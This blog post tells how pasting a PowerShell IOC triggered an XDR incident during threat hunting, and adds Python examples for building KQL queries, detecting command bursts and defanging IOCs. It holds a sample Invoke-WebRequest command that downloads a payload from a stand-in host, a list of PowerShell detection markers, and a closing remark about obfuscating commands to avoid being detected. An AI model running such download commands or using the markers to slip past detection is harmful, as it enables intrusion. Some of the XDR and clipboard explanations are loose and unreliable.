Hi :)
Hello all hunters, today's blog is all about how a copy-paste habit can turn you from a threat hunter into a threat, so grab your cup of coffee, put on some lo-fi piano music and deep dive with me into the art of threat hunting.
All the information below is for testing purposes, to check the power of XDR and how it behaves, from hunting to incident resolution and more.
Out Here Catching Threats, Not Feelings
Recently, a user was tasked with collecting IOCs related to a certain group from public reports, MITRE ATT&CK and other related threat intelligence platforms. Cute work, right? With lots of dopamine and a desire to do this threat hunting, check whether any related IOCs are there, and detect them in their early stages.
The idea was to collect these IOCs and put them into a file, then filter them depending on the assets they have; after that he would write KQL for these IOCs to run them in the XDR, with lots of KQL tuning and coffee alongside the work.
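The collect, filter and hunt steps above, as an added example that is not the author's script: a constructed IOC list is filtered down to the platforms actually present in the estate, then grouped by IOC type into one advanced-hunting query each. The IOC values and the asset inventory are constructed placeholders, and the Defender advanced-hunting table and column names (DeviceProcessEvents.ProcessCommandLine, DeviceFileEvents.SHA256, DeviceNetworkEvents.RemoteUrl and RemoteIP) are assumed from the public schema.

```python
"""Turn a collected IOC list into advanced-hunting KQL, keeping only the
IOCs that apply to the assets the environment actually has.

Added example for this post, not the author's script. IOC values and the
asset inventory are constructed; table/column names are assumed from the
public Defender advanced-hunting schema.
"""
from collections import defaultdict

# Constructed IOC records: (type, value, platform the IOC applies to).
IOCS = [
    ("sha256", "a" * 64, "windows"),
    ("domain", "evil-update.example", "any"),
    ("ip", "203.0.113.7", "any"),
    ("cmdline", "powershell.exe -EncodedCommand PLACEHOLDER", "windows"),
    ("cmdline", "bash -c 'PLACEHOLDER_IOC'", "linux"),
]

# Constructed asset inventory: platforms present in the environment.
ASSET_PLATFORMS = {"windows"}

# Which table, column and KQL operator each IOC type is hunted with
# (assumed schema: see lead-in).
TARGETS = {
    "sha256": ("DeviceFileEvents", "SHA256", "in"),
    "domain": ("DeviceNetworkEvents", "RemoteUrl", "has_any"),
    "ip": ("DeviceNetworkEvents", "RemoteIP", "in"),
    "cmdline": ("DeviceProcessEvents", "ProcessCommandLine", "has_any"),
}


def filter_iocs(iocs, platforms):
    """Keep IOCs that apply to at least one platform present in the estate."""
    return [i for i in iocs if i[2] == "any" or i[2] in platforms]


def kql_string(value):
    """Quote a value as a KQL string literal (escape backslashes and quotes)."""
    return '"' + value.replace("\\", "\\\\").replace('"', '\\"') + '"'


def build_kql(iocs, lookback="7d"):
    """Group IOCs by type and emit one query per type, keyed by IOC type."""
    by_type = defaultdict(list)
    for kind, value, _ in iocs:
        by_type[kind].append(value)
    queries = {}
    for kind, values in by_type.items():
        table, column, op = TARGETS[kind]
        literals = ", ".join(kql_string(v) for v in values)
        queries[kind] = (
            f"{table}\n"
            f"| where Timestamp > ago({lookback})\n"
            f"| where {column} {op} ({literals})\n"
            f"| project Timestamp, DeviceName, {column}"
        )
    return queries


if __name__ == "__main__":
    for kind, query in build_kql(filter_iocs(IOCS, ASSET_PLATFORMS)).items():
        print(f"-- {kind}\n{query}\n")
```

The Linux command-line IOC is dropped by the asset filter, so it never reaches the query or the clipboard; command-line values are quoted through `kql_string` so a backslash or quote inside an IOC cannot break the query.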
The Moment of Truth: When Everything Unfolds
BUT, WAIT!!!
…………… not all work will work as you think, darling. One of the IOCs that the user copied crushed the way he thinks: the moment he copied a PowerShell IOC and pasted it into Copilot to make a quick KQL, so he could see how his KQL might fit and tune it, and also to take ideas and notes, suddenly the browser crashed and an alert from Windows Defender was generated.
…………… OMG, what has happened now? He didn't even run that PowerShell command to test its behavior, he just copied it.
The moment of truth: he went to check the XDR, as it had detected it and classified it as a severe incident (sorry, I don't have a screenshot, but imagine that). He went into the attack story (a feature in the XDR) of the incident and watched as the PowerShell command created a file in a certain location, C:\Users\NOOBi\AppData\Local\Temp\[file_name]. After that he ran a full scan on the device, all was good, and the XDR showed that the remediation stage was successfully DONE; the file was also deleted and all is good. BUT why and how is that?
XDR: The Protector, Watching Over It All
Doing some research: XDR, Extended Detection and Response, is a unified security incident platform that uses AI and automation. It provides an efficient way to protect against and respond to advanced cyberattacks. XDR integrates RAM analysis to detect malicious activities by monitoring memory for unusual behaviors like code injection or unauthorized access.
XDR operates at both the application and kernel levels, depending on the specific capabilities of the platform.
Application Level: XDR gathers data from applications and services to identify behavioral anomalies, such as unusual user activity or application exploits. This level focuses on detecting issues like unauthorized access or application-layer attacks.
Kernel Level: For deeper insights, XDR often integrates with kernel-level operations to monitor low-level system activities like process creation, memory manipulation and privileged operations. This helps detect advanced threats such as rootkits or malicious code injections that operate at the OS core.
RAM analysis typically occurs at the kernel level because it requires monitoring low-level system operations like memory allocation, execution and process communication. This is essential for detecting activities such as code injection, buffer overflows or memory-resident malware.
Clipboard and RAM: A Love Story Written in Memory
Clipboard data is temporarily stored in RAM, allowing the system to retain copied or cut content while running. Applications interact with this memory region to access or modify clipboard data. Malware may target this area to monitor or steal sensitive information.
The alert on the XDR system was triggered due to suspicious behavior from the PowerShell copy-paste commands, which showed up as short time chunks between each copy. EDR systems focus on monitoring unusual activities, such as malicious commands or scripts, to identify and respond to threats. While they may typically monitor clipboard contents, the EDR detected the suspicious activity within the system. In this case, the alert likely resulted from the PowerShell copy-paste command's behavior, as EDRs are designed to respond to potential threats in real time. Based on related reports, it's evident that the EDR classified the behaviors' activity as an Indicator of Attack (IOA), triggered by the rapid succession of IOCs.
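The "rapid succession" idea above, as an added example that is not the XDR vendor's detection logic (which is not public): a sliding-window rule that raises one IOA per user when several suspicious-looking command strings from that user land inside a short window, and stays quiet for a single stray command. The telemetry lines, the user names and the marker list are constructed for the example.

```python
"""Sliding-window 'rapid succession' check over constructed command telemetry.

Added example for this post; it is not the vendor's detection logic, only the
shape of an IOA rule that fires when one user surfaces several suspicious
command strings within a short window. Log lines and users are constructed.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed telemetry: "<ISO-8601 timestamp> <user> <observed command string>".
SAMPLE_EVENTS = [
    "2024-05-01T10:00:01Z NOOBi powershell.exe -EncodedCommand PLACEHOLDER_1",
    "2024-05-01T10:00:09Z NOOBi powershell.exe -EncodedCommand PLACEHOLDER_2",
    "2024-05-01T10:00:14Z NOOBi powershell.exe -EncodedCommand PLACEHOLDER_3",
    "2024-05-01T10:00:20Z NOOBi powershell.exe -EncodedCommand PLACEHOLDER_4",
    "2024-05-01T10:45:00Z NOOBi powershell.exe Get-Process",
    "2024-05-01T11:00:00Z alice powershell.exe -EncodedCommand PLACEHOLDER_5",
]

# Constructed, deliberately small marker list; a real rule would use the
# platform's own command-line classifiers rather than substrings.
SUSPICIOUS_MARKERS = ("-encodedcommand", "-enc ", "iex(", "invoke-expression")


def parse_events(lines):
    """Parse telemetry lines into (timestamp, user, command) tuples."""
    events = []
    for line in lines:
        ts, user, cmd = line.split(" ", 2)
        events.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), user, cmd))
    return events


def is_suspicious(cmd):
    """Case-insensitive substring match against the marker list."""
    lowered = cmd.lower()
    return any(m in lowered for m in SUSPICIOUS_MARKERS)


def find_bursts(events, window_s=60, threshold=3):
    """Return (user, window_start, count) for each user whose suspicious
    commands reach `threshold` inside any `window_s`-second window.
    Only the first burst per user is reported, to avoid alert storms."""
    recent = defaultdict(deque)   # user -> timestamps inside the current window
    bursts = []
    flagged = set()
    for ts, user, cmd in sorted(events):
        if not is_suspicious(cmd) or user in flagged:
            continue
        q = recent[user]
        q.append(ts)
        # Drop timestamps that fell out of the window.
        while q and ts - q[0] > timedelta(seconds=window_s):
            q.popleft()
        if len(q) >= threshold:
            bursts.append((user, q[0], len(q)))
            flagged.add(user)
    return bursts


if __name__ == "__main__":
    for user, start, count in find_bursts(parse_events(SAMPLE_EVENTS)):
        print(f"IOA: {user} surfaced {count} suspicious commands from {start:%H:%M:%S}")
```

With the defaults, NOOBi's four encoded commands inside twenty seconds raise one IOA, the later `Get-Process` is ignored, and alice's single command never reaches the threshold; raising `threshold` to 5 makes the rule silent on this sample.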
The Moral of the Story: Don't Skip the Plot Twist
What we've learned: never copy a suspicious PowerShell command into your clipboard without proper precautions like obfuscation, slicing, defanging or working in an isolated environment, to prevent yourself from being detected. Also, copying a huge amount of these suspicious PowerShell IOCs in a short time will generate suspicious behavior, resulting in an alert.
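The defanging and slicing precautions, as an added example that is not the author's workflow: the IOC is defanged with the usual CTI conventions (hxxp, [.], [:]) before it goes into the working file or the clipboard, split into short slices that are harmless on their own, and only re-fanged inside the tool that needs the exact value. The sample command line, the host name and the file names are constructed.

```python
"""Defang and slice suspicious command-line IOCs before they are stored or
copied, and restore them only where the exact value is needed.

Added example for this post, not the author's workflow; the sample IOC is
constructed. Defanging follows the common CTI convention (hxxp, [.], [:]).
"""
import re

# Constructed IOC: a download command with a constructed host and the
# temp path from the post (the file name is made up).
SAMPLE_IOC = (
    r"powershell.exe Invoke-WebRequest http://evil-update.example/payload.txt"
    r" -OutFile C:\Users\NOOBi\AppData\Local\Temp\payload.txt"
)


def defang(ioc):
    """Make URLs, dotted names and IPs in the string non-clickable and
    the command non-runnable as-is."""
    out = re.sub(r"(?i)\bhttp(s?)://", r"hxxp\1://", ioc)
    # a.b.c -> a[.]b[.]c, only between alphanumerics so punctuation is untouched
    out = re.sub(r"(?<=[A-Za-z0-9])\.(?=[A-Za-z0-9])", "[.]", out)
    out = out.replace("://", "[:]//")
    return out


def refang(ioc):
    """Exact inverse of defang(); use only inside the hunting tool."""
    out = ioc.replace("[:]//", "://").replace("[.]", ".")
    return re.sub(r"(?i)\bhxxp", "http", out)


def is_defanged(ioc):
    """True when no live scheme or dotted token remains."""
    return not re.search(r"(?i)\bhttps?://", ioc) and not re.search(
        r"(?<=[A-Za-z0-9])\.(?=[A-Za-z0-9])", ioc
    )


def slice_ioc(ioc, size=16):
    """Split an IOC into fixed-size slices; no slice is a runnable command."""
    return [ioc[i:i + size] for i in range(0, len(ioc), size)]


def join_slices(parts):
    """Reassemble slices produced by slice_ioc()."""
    return "".join(parts)


if __name__ == "__main__":
    safe = defang(SAMPLE_IOC)
    print("stored :", safe)
    print("slices :", slice_ioc(safe))
    print("restored matches original:", refang(safe) == SAMPLE_IOC)
```

Store and paste the defanged form; the query builder or sandbox calls `refang` at the last moment, so the live command string never sits on the clipboard.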
Written by: Sameer Fakhoury aka.semo